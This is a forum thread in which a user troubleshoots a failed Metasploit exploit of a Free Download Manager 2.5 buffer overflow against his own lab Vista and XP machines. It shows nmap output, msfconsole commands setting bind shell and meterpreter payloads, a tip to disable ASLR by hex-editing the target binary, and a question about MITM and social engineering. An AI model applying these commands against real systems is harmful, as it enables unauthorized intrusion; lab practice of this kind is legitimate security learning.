Results 1 to 8 of 8

Thread: Playing with Free Download Manager Remote Control Server Buffer Overflow

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Lightbulb Playing with Free Download Manager Remote Control Server Buffer Overflow

    As I have a fully patched vista box, I was trying to make it vulnerable. My idea was to install the Free Download Manager 2.5 Build 758 in it, so that I can exploit it with my BT3/BT4b Box. Obviously, I am using fdm_auth_header exploit. As payload, I'm happy to get a shell, although meterpreter session is preferred. I tried several payloads including meterpreter, reverse meterpreter, bind tcp, but no luck yet. So, just wondering whether anyone has beter experience... Thanks a lot for your time.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  2. #2
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Maybe go for a different exploit? Or try it out on a XP box and see if you have issues with the exploit itself or if there might be an issue with Vista.
    Tiocfaidh ár lá

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Thanks KMDave for the reply.. I think fdm_auth_header is the exploit that should work against download manager. This one clearly says that "This module exploits a stack overflow in Free Download Manager Remote Control 2.5 Build 758. When sending a specially crafted Authorization header, an attacker may be able to execute arbitrary code."

    I'll try another time this night with vista, after disabling AV & firewall.

    At this moment, I don't have a xp box with me.... If someone have a go with xp, that will be great. Any newbie? pm me please if interested, I'll guide you through. Cheers guys
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Good friend of the forums
    Join Date
    Feb 2009
    Posts
    356

    Default

    remember Vista got Address Space Randomization, and if it's enabled in FDM you're screwed... you can disable it in the exe of fdm with a hex editor, it's a simple change, (don't remember the address but you can research on the topic)

  5. #5
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Update: Tried with vista, after disabling AV & firewall - nothing happens. Nessus scan, as well, doesn't find any vulnerability.

    Update2: Managed to get hold of a XP box (unpatched), will try here.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  6. #6
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Now I'm really stuck, must be missing something completely. Mind that there is no service pack installed on the XP box. Free Download Manager 2.5 Build 758 is running on the box, here is the nmap output from attacker (BT4b):
    root@bt:~# nmap -sV -O 192.168.1.5

    Starting Nmap 4.68 ( http://nmap.org ) at 2009-05-26 18:16 EDT
    Interesting ports on 192.168.1.5:
    Not shown: 1712 closed ports
    PORT STATE SERVICE VERSION
    135/tcp open msrpc Microsoft Windows RPC
    139/tcp open netbios-ssn
    445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
    1025/tcp open msrpc Microsoft Windows RPC
    5000/tcp open upnp Microsoft Windows UPnP
    MAC Address: 00:1F:1F:08:8E:AE (Edimax Technology Co.)
    Device type: general purpose
    Running: Microsoft Windows 2000
    OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2
    Network Distance: 1 hop
    Service Info: OS: Windows

    Host script results:
    |_ Discover OS Version over NetBIOS and SMB: Windows XP

    OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 10.65 seconds
    Here is the unsuccessful exploitation:
    msf > use windows/http/fdm_auth_header
    msf exploit(fdm_auth_header) > set payload windows/shell/bind_tcp
    payload => windows/shell/bind_tcp
    msf exploit(fdm_auth_header) > set rhost 192.168.1.5
    rhost => 192.168.1.5
    msf exploit(fdm_auth_header) > exploit
    [*] Trying target Free Download Manager 2.5 Build 758...[*] Started bind handler
    [-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).[*] Exploit completed, but no session was created.
    Tried meterpreter payload:
    msf exploit(fdm_auth_header) > set payload windows/meterpreter/bind_tcp
    payload => windows/meterpreter/bind_tcp
    msf exploit(fdm_auth_header) > exploit
    [*] Trying target Free Download Manager 2.5 Build 758...[*] Started bind handler
    [-] Exploit failed: The connection was refused by the remote host (192.168.1.5:80).[*] Exploit completed, but no session was created.
    Any idea? What I can see is port 80 is not open.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  7. #7
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Maybe the downloadmanager has to download the file from the attacking machine? It won't sit and listen for incoming connections usually.

    It is the same as with for instance the Quicktime exploit. The victim has to open a specific file or URL in order for an exploit to be sent to him.
    Tiocfaidh ár lá

  8. #8
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    So, should I use MITM attack & SE (I mean, if it was real world) to make the XP box to download someting from the attacker?
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •